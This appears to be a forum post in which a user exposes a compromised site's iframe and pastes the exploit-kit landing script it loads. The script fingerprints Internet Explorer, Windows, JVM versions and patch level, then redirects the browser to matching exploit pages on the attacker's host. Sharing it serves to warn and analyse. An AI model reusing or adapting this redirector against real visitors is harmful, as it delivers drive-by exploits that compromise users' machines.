well
the iframe on wxw.dougansss.com/tgp/ is definately exploits....
this is the exploit code....
wxw.dougansss.com/dar/loading.html
and it explains why I wasn't hit by it when I entered, it's only IE they target...
Code:
<IE:clientCaps ID="oClientCaps" />
<script type="text/javascript" language="JavaScript">
var ExploitNumber=0;
var Bug_param="";
function GetVersion(CLSID)
{
if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
{return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
else
{return Array(0,0,0,0);}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows 95') != -1) return "95"
else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
else if (IE_vers.indexOf('Windows 98') != -1) return "98"
else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
}
var CGI_Script="http://wxw.dougansss.com/dar/";
if (navigator.appName=="Microsoft Internet Explorer")
{
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1)
{
var WinOS=Get_Win_Version(IEversion);
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
var JVM_vers = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}");
var IE_vers = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
var XP_SP2_patched=0;
switch (WinOS)
{
case "2K":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
if (IE_vers[0]==6)
{ ExploitNumber=3; }
else
{ ExploitNumber=2; }
}
break;
case "2K3":
ExploitNumber=3;
break;
case "XP":
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else // if JVM = 5.0.3810.0 or higher
{
for (var i=0; i < PatchList.length; i++)
{
if (PatchList[i]=="SP2")
{ XP_SP2_patched=1; }
}
if (XP_SP2_patched==0)
{
ExploitNumber=3;
}
else
{
ExploitNumber=4;
}
}
break;
default:
if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
{ ExploitNumber=1; }
else
{ ExploitNumber=2; } // if JVM = 5.0.3810.0 or higher
break;
}
// launching exploit which number is depends on Windows and IE versions
switch (ExploitNumber)
{
case 1:
// 95, NT, ME, 98, 2k, XP
Bug_param=Bug_param+"e1/e1.html";
break;
case 2:
// 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
Bug_param=Bug_param+"e2/e2.html";
break;
case 3:
// 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
Bug_param=Bug_param+"e3/e3.html";
break;
default:
break;
}
}
}
if (Bug_param != ''){
window.location=CGI_Script+Bug_param;
}
it's not like they are trying to hide it's a exploit LOL